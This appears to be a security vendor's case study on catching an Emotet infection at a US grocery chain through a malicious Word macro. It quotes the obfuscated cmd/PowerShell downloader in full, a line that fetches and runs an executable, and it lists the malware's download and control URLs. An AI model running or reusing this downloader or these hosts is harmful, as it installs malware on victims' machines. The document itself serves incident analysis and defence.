Emotet Malware Ejected

The Network:  Our customer is a major grocery chain with more than 150 stores in 22 states across the USA with a well-administered IT network.

The Expectation: Extensive prevention technologies are deployed to keep the HQ assets including the data center and workstations of the staff safe. It is recognized that perfect protection is not practical and so they use the SIEMphonic service for monitoring.

The Catch: A first-time-seen process (832.exe) was observed to be executing on a user workstation. The process flow showed that the user had opened an MS Word document called doc-843882.doc that had arrived as an attachment.

The Find: The SIEMphonic security analyst was able to trace the flow of actions. Unbeknownst to the user, a VBA (Visual Basic for Applications) macro embedded in the MS Word document that spawned a command shell and executed the following PowerShell command:

cmd /V/C"set NnQ=                 }}{hctac};kaerb;hZP$ metI-ekovnI;)hZP$ ,soj$(eliFdaolnwoD.rVS${yrt{)Rhl$ nisoj$(hcaerof;''exe.''+foO$+''\''+cilbup:vne$=hZP$;''238'' = foO$;)''@''(tilpS.''CrW2GZfa/sdaolpu/tnetnoc-pw/ek.ca.ibnou.murofur//:ptth@0csAVpJ05D/ln.rezjiwebraav//:ptth@YVLs5fQq3m/moc.enotsaniv//:ptth@optEUfXNM/moc.odsalp.www//:ptth@ZvyL64iq0w/baltset/if.monatad.s. 

A connection was established to the command & control (C&C) server at http://www[.]plasdo[.]com/MNXfUEtpohttp://vinastone[.]com/m3qQf5sLVYhttp://vaarbewijzer[.]nl/D50JpVAsc0, http://ruforum[.]uonbi[.]ac[.]ke/wp-content/uploads/afZG2WrC without the user’s knowledge. The malware 832.exe was then dropped on disk and executed.

The Fix: The EventTracker SOC (Security Operations Center) promptly alerted the grocery chain’s system administrator to quarantine the infected workstation. The user who had logged in remotely was forcibly logged off and reminded of security best practices for unknown attachments.

The Lesson: Attackers are relentless, and automation allows the launch of a high volume of such attacks at low cost. A slip up by one user can be problematic, if undetected, such infections will steal data, spread laterally and cause havoc. Workstations are the most vulnerable because they have widespread deployment and are used by non-technical users who are susceptible to cleverly-crafted attacks. Continuous monitoring by the SIEMphonic service provides visibility and threat detection that avoids disrupted operations and the potential loss of sensitive data.